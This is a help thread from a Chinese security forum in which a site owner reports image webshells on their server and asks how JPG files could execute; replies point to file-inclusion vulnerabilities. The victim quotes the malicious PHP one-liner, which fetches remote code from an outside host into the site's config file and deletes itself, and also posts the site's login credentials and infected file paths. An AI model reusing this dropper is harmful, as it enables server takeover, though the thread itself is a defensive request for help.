首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 求助问答
    3. 发新帖
未解决 [求助]网址有图片马
发表于: 2020-7-10 21:15 2561

未解决 [求助]网址有图片马

wx_三五瓶 活跃值
2020-7-10 21:15
2561

http://w.mwovo1.cn/ 账号密码 123 123

 

图片马内容
<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>

 

由于我服务器搬家了,日志没有了,现在没办法查看日志,怎么能找出漏洞在哪,还有图片马不是需要找到解析漏洞才行吗,jpg他怎么直接执行?


[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!

收藏
免费 0
支持
分享
最新回复 (9)
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2

http://w.mwovo1.cn//Public/static/ueditor/php/upload/7891592914555.jpg

1791592203212.JPG
23861591427140.JPG    这三个都是图片马一样的

最后于 2020-7-10 22:28 被wx_三五瓶编辑 ,原因:
2020-7-10 21:15
0
敏而好学
雪    币: 5514
活跃值: (2254)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3

图片马怎么实现的?

最后于 2020-7-10 21:24 被敏而好学编辑 ,原因:
2020-7-10 21:23
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
敏而好学 图片马怎么实现的?
图片不是需要解析漏洞才行吗
2020-7-10 21:27
0
敏而好学
雪    币: 5514
活跃值: (2254)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
wx_三五瓶 图片不是需要解析漏洞才行吗
PHP能将图片改扩展名,并且运行吗?
2020-7-10 21:59
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
不清楚有解析漏洞啊
2020-7-10 22:13
0
Lauv
雪    币: 583
活跃值: (86)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
文件包含就执行了
2020-7-11 16:22
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
Lauv 文件包含就执行了
什么文件包含?
2020-7-11 18:13
0
lishua
雪    币: 842
活跃值: (310)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9

他的意思应该是说,如果有文件包含漏洞,可以包含这个1791592203212.JPG这个图片,那么不管被包含的文件后缀名是什么,文件中的内容都会被执行。

所以说应该是建议楼主查一查有没有文件包含漏洞。

另外,楼主的日志没了,这个比较难搞了。。


最后于 2020-9-25 16:07 被lishua编辑 ,原因:
2020-9-25 15:56
1
mb_fqdqyhnn
雪    币: 200
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
10
有没有人会做网站
2020-9-25 19:14
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//